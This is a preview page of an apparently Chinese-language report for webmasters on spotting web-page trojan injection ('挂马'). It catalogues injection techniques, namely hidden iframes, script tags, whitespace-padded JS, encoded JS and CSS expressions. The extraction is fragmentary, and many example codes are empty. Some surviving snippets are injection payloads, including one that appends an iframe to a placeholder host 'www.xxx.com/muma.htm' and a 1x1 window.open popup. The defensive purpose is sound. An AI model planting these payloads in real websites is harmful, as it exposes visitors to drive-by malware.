网页挂马调查报告

网页挂马调查报告

ID:6349573

大小:170.50 KB

页数:13页

时间:2018-01-11

网页挂马调查报告_第1页
网页挂马调查报告_第2页
网页挂马调查报告_第3页
网页挂马调查报告_第4页
网页挂马调查报告_第5页
资源描述:

《网页挂马调查报告》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、网页挂马调查报告网页被挂马是最让站长头痛的一件事情,因为这说明已经有骇客拥有了你的网站的操作权限,面对这种情况,首先如果是虚拟主机用户应当积极与服务商联系运行查杀工具,彻底清除恶意代码和后门;而如果你拥有自己的主机,则应当积极检查程序是否有漏洞并立即升级到最新的补丁。所以作为站长就应当最早的发现网页被挂马的代码,下面是一些比较常见的挂马方式:常见挂马方式(一)Iframe框架挂马这种挂马方式比较多,主要是以下这种格式:“”,width=0和height=0是为了隐藏框架。(二)Script挂马与Iframe挂马平级

2、,也比较常见,主要是以下这种格式:"",当然也可以演变为Iframe挂马,""。附上一张石头博客被Script挂马的截图(三)js文件挂马只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等。(四)Js加密变相挂马这

3、种挂马方式与Script挂马差不多,惟一不同的就是使用了Encode隐藏了源JS的后缀,但同样可以达到执行代码的目的,主要是以下这种格式:“”虽然表面上看只是引用了一个txt文件,但是依然可以顺利执行其中的代码。(五)body挂马(六)隐蔽挂马top.document.body.innerHTML=top.document.body.innerHTML+'r

4、amesrc="http://www.xxx.com/muma.htm/">';(七)JAJA挂马window.open("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");(八)图片伪装(九)伪装调用

5、(十)高级欺骗页面要显示的内容functionwww_163_com(){varurl="网马地址";open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");}(十一)Css挂马Css挂马主要是在Css文件中引用外部Js文件来实现。主要是以

7、下这种格式:body{background:url('javascript:document.write(";")')}或者引用Css中的expression来实现执行Js的方式,比如:a{start:expression(document.write(''))}(五)高级欺骗挂马这种挂马方式与一般

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。